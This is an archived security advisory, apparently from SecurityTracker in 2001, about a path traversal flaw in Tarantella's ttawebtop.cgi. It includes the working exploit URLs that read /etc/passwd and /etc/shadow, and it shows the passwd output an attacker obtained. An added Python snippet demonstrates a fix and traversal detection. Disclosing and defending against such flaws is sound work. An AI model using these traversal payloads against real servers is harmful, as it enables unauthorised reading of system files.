SecurityTracker.com
SecurityTracker
Archives
Category:   Application (Web Server/CGI)  >   Tarantella
Vendors:   Tarantella, Inc.
Tarantella Application Web Server Discloses Files on the Server to Remote Users
SecurityTracker Alert ID:  1001779
SecurityTracker URL:  http://securitytracker.com/id/1001779
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 19 2001
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  

Description:   A vulnerability has been reported in the Tarantella application server that lets remote users obtain files located anywhere on the server.

The vulnerability reportedly resides in the ttawebtop.cgi module.

If a remote user issues the following type of example URL, the server will return the world-readable password file:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

If a remote user attempts to retrieve a file that is not readable by the web server, it will return a 'file missing' error message, as shown below:

http://[targethost]/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

The vendor has reportedly been notified.
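As an added illustration (not code from the advisory or from Tarantella), the following Python contrasts the naive path construction the report describes, where the `pg` value is appended to the CGI's directory and the `..` segments are left in place, with a confined version that normalises the decoded value and refuses anything that leaves the document root; a third helper flags such requests for log review. The document root `/tarantella` is a constructed stand-in taken from the error text on the page, and the function names are hypothetical.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed document root: the error text on the page shows '/tarantella/../..',
# so this constructed value stands in for wherever the CGI resolves 'pg'.
DOC_ROOT = "/tarantella"


def vulnerable_resolve(doc_root: str, pg: str) -> str:
    """Reproduce the reported behaviour: the decoded 'pg' value is glued onto
    the document root with no normalisation, so '..' segments walk out of it."""
    return doc_root + "/" + unquote(pg)


def safe_resolve(doc_root: str, pg: str) -> Optional[str]:
    """Decode once, normalise, and require the result to stay inside doc_root.
    Returns the confined path, or None when the request must be refused."""
    decoded = unquote(pg)
    if "\x00" in decoded:          # a NUL would truncate the name in a C open()
        return None
    root = posixpath.normpath(doc_root)
    # Leading slashes are stripped so an absolute 'pg' cannot replace the root.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                # normalised path escaped the document root
    return candidate


def escapes_root(doc_root: str, pg: str) -> bool:
    """Detection helper for log review: True when the naive resolution, once
    normalised, lands outside doc_root, i.e. the request is a traversal."""
    root = posixpath.normpath(doc_root)
    naive = posixpath.normpath(vulnerable_resolve(root, pg))
    return naive != root and not naive.startswith(root + "/")


if __name__ == "__main__":
    # Constructed sample 'pg' values: one legitimate, two traversal attempts.
    for pg in ("webtop/index.html", "../../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(pg, "->", vulnerable_resolve(DOC_ROOT, pg),
              "| safe:", safe_resolve(DOC_ROOT, pg),
              "| traversal:", escapes_root(DOC_ROOT, pg))
```

Note that a double-encoded sequence such as `%252e%252e` decodes to a literal `%2e%2e` and is looked up as an ordinary file name, so a single decode before normalisation is enough; decoding twice would reintroduce the problem.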

Impact:   A remote user can obtain world-readable files located anywhere on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.tarantella.com/
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Caldera/SCO), Linux (Red Hat Linux), Linux (SuSE), Linux (Turbo Linux), UNIX (AIX), UNIX (HP/UX), UNIX (Open UNIX-SCO), UNIX (Solaris - SunOS), UNIX (Tru64)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Has Fixed This Issue) Re: Tarantella Application Web Server Discloses Files on the Server to Remote Users
The vendor announces that they have fixed the problem. The vendor reports on which versions were vulnerable.



 Source Message Contents

Subject:  SCO Tarantella Remote file read via ttawebtop.cgi


SCO has been notified of this issue. 


-------- Original Message --------
Subject: SCO Tarantella Remote file read via ttawebtop.cgi
Date: Mon, 18 Jun 2001 13:06:41 -0400
From: KF <dotslash@snosoft.com>
To: recon@snosoft.com


http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/
...


No perms to shadow... 

http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow

 
File missing

The following file could not be found:

/tarantella/../../../../../../../../../../../../../../../etc/shadow

 Please give this information to a Tarantella Administrator.

-KF


Copyright 2020, SecurityGlobal.net LLC